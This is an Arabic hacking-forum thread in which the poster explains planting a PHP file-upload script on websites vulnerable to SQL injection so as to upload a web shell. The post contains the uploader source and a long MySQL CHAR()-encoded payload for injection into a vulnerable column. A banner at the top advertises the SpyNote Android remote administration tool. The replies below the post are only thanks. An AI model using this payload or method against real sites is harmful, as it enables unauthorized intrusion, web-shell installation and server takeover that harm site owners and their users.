1. SpyNote v5.0 Android Remote Administration Tool
    النسخة تعمل من API 10 الى API 25 اضافات واصلاحات عديده
    خصائص البيلدر مهمه جدا في ثبات الاتصال قرائة الموضوع

استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

الموضوع في 'المواضيع المُكرّرة والمُخالفة' بواسطة r3xb0t3r, بتاريخ ‏2 ديسمبر 2011.

كاتب الموضوع : r3xb0t3r المشاهدات : 4,995 الردود : 13 ‏2 ديسمبر 2011
حالة الموضوع:
مغلق
  1. غير متصل

    r3xb0t3r
    rank
    Developer

    عضو منذ:
    ‏2 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    السلام عليكم ورحمة الله وبركاته ...

    طبعا بدون مقدمات وكاتب الموضوع على عجلة ...

    قبل فترة اكثر من شهر خطرت ببالي فكرة ...

    هي شلون نعمل مركز رفع من الخلال المواقع المصابة بـ SQL

    الطريقة كالتالي ...

    ناخذ سكربت مركز الرفع وهذا الكود بتاعه ...

    كود PHP:
     <?php 
    echo '<b>Upload Center</b>';
    echo 
    '<b><br><br>'.php_uname().'<br></b>';
    echo 
    '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    echo 
    '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
    if( 
    $_POST['_upl'] == "Upload" ){ if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Done !!!</b><br><br>'; }
     else { echo 
    '<b>!!!!!!!Upload Failed!!!!!! </b><br><br>'; }}?>  
    ونروح على ادادة Hack Bar الموجودة بالفايرفوكس ونختار

    SQL > MySQL > MySQLCHAR

    راح يظهر مستطيل صغير تخليه بيه اكواد مركز الرفع الي فوق وتضغك ok راح تحصل هذه التشفيرة

    كود PHP:
    CHAR(677265824054484432545144324949504432494852443249495044325150443251504432494849443257574432494852443249494944325150443251574432544844325756443254504432565344324949504432494856443249494944325755443249484844325150443254554432494849443249494844324949544432494849443249495244325448443252554432575644325450443251574432535744325150443249484944325757443249485244324949494432515044325157443254484432575644325450443254484432575644324949524432545044325448443257564432494952443254504432515744325254443249495044324948524432494950443257534432494955443249494844325755443249485744324948494432524844325249443252544432515744325448443257564432494952443254504432544844325255443257564432545044325157443253574432515044324948494432575744324948524432494949443251504432515744325448443249485044324949494432494952443249485744325150443257554432575744324949544432494853443249494944324949484432544944325152443251524432515044324948574432494849443249495444324948524432494949443249484844325449443251524432494950443249494944324949534432494954443251524432515044324948494432494948443257574432494954443249504944324949504432494849443254494432515244324948574432494955443249485644324949544432494853443249495044325755443249495244324949544432525544324948504432494949443249495244324948574432525344324948484432575544324949544432575544325152443251504432494948443257554432494857443249484944325449443251524432494955443249495044324948564432494949443257554432494848443249484944324949524432515244325150443249485344324948484432544944325152443249495544324949504432494856443249494944325755443249484844324948494432494952443251524432545044325157443253574432515044324948494432575744324948524432494949443251504432515744325448443249485344324949484432494950443249495544324949544432515044324949544432495049443249495044324948494432544944325152443249485044324948534432494856443249484944325152443251504432494948443257554432494857443249484944325449443251524432494850443249485344324948564432494849443251524432515044324949534432494853443249505044324948494432544944325152443253514432525644325152443254504432544844324948534432494948443249495044324949554432494954443251504432494948443257554432494857443249484944325449443251524432575344324949554432494950443249485644325152443251504432494954443249504944324949504432494849443254494432515244324949534432494955443257564432494857443249485344324949544432515244325150443249485344324948484432544944325152443257534432494955443249495044324948564432515244325150443249495644325755443249485644324949554432494849443254494432515244325653443249495044324948564432494949443257554432494848443251524432545044325448443252554432494850443249494944324949524432494857443254504432515744325357443251504432494853443249485044325248443251504432515444325753443256484432555744325651443256524432574944325157443257534432494955443249495044324948564432515744325751443251504432544944325449443251504432515244325653443249495044324948564432494949443257554432494848443251524432515044325249443249505144325150443249485344324948504432524844325452443257574432494949443249495044324950494432524844325154443257534432554844325551443255544432545744325651443257494432515744324948504432494853443249485644324948494432515744325751443257494432515744324949544432494857443249495044325753443249494844325755443249485744324948494432515744325751443252524432515044325154443257534432554844325551443255544432545744325651443257494432515744324948504432494853443249485644324948494432515744325751443257494432515744324949484432575544324948574432494849443251574432575144325249443252494432515044324950514432515044324948494432575744324948524432494949443251504432515744325448443257564432545044325456443249494944324949484432494849443251504432515144325151443251514432544844325255443257564432545044325448443257564432494952443254504432544844325756443249495244325450443251574432535744325150443249505344325150443251504432494849443249485644324949534432494849443251504432495051443251504432494849443257574432494852443249494944325150443251574432544844325756443254504432515144325151443251514432515144325151443251514432515144325653443249495044324948564432494949443257554432494848443251504432554844325755443249485344324948564432494849443249484844325151443251514432515144325151443251514432515144325150443254484432525544325756443254504432544844325756443249495244325450443254484432575644324949524432545044325157443253574432515044324950534432495053443254514432545041)
    بعدها تاخذها على طول للعمود المصاب وتخليه مكانه وتضغط انتر وان شاء الله تشوف مركز الرفع امامك

    ومن خلال المركز تكدر ترفع ملفاتك حتى الشل وتم التجربة وحمد لله انرفع لكن المشكلة بتحديد مساره

    طيب يجي واحد يسأل كيف عرفت انرفع ..؟ لو ما انرفع كان السكربت طبع لك upload faild ....

    واعتقد حل مشكلة المسار هي تنصيب سكربت مصاب على السيرفر الشخصي وتطبيق الفكرة ونشوف الشل وين ..

    همسة : نزلت هذا الشرح بسبب بعض الناس الي علمتهم هذه الطريقة على الخاص وقامو بنشروها وطلعو هم المكتشفين واصحاب الخبرة [​IMG]


    اضافة للموضوع ... صورة للتطبيق على الموضوع

    [​IMG]

    موفقين ^:"
     


    1 person likes this.
    جاري تحميل الصفحة...
  2. غير متصل

    zorax
    rank
    Developer

    عضو منذ:
    ‏5 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

    كل الشكر والتحيه والتقدير
    مجهود اكثر من رائع
    سلمت يداك
    )5:")5:"
     


  3. غير متصل

    sly hkr
    rank
    Developer

    عضو منذ:
    ‏7 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    ???
    الإقامة:

    رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

    رائع حبيبى مشكور على هدا المجهود%:"​
     


  4. غير متصل

    NaZy
    rank
    Developer

    عضو منذ:
    ‏4 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

    الله يعطيك العافيه
    شرح رائع وسهل
    الله يوفقك
    )5:"
     


  5. غير متصل

    HaCkER-EgYpT
    rankrank
    Developer

    عضو منذ:
    ‏9 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

    شكرٍآَ آخـِىَُِ .. وآصَل موٍضوٍعَ متعوٍبَ فيـِهَ

    ^:"^:"^:"
     


  6. غير متصل

    DJ_HacKeR <b><font color="silver" size="4" face="Arial">ṤạĻỖ
    rank
    Developer

    عضو منذ:
    ‏9 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    ::.طالب.::
    الإقامة:

    رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

    وعليككُمَ آلسَلآمَ ورحمة آلله وبركآتهَ ،

    يعيطككَ آلعآفيهَ يَ آلغآليَ ،


    وآصلَ آبدآعكَ ،

     


  7. غير متصل

    الحربي
    rankrank
    DeveloPer Plus

    عضو منذ:
    ‏9 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

    مجهود رآئع يآبعدي !:"
    لاهنت ولك احلى ++
     


  8. غير متصل

    احمد العراقي
    ExpErt DeveloPer

    عضو منذ:
    ‏17 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

    يعطيك الف عافية اخي

    وبارك الله فيك

    مبادرة طيبة تشكر عليها وجزاك الله عنها خير الجزاء&:"
     


  9. غير متصل

    OuT-L4w <b><font size="4"><font color="#FF0000">Ṩ</font><f
    rankrank
    Developer

    عضو منذ:
    ‏10 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

    الله يعافيك اخي .^:"
     


  10. غير متصل

    MSOODN
    rank
    ExpErt DeveloPer

    عضو منذ:
    ‏11 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل


    سلام عليكم ورحمة الله وبركاته يا غالي
    والله موضوع رائع
    يعطيك العافية أخي الكريم^:"
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...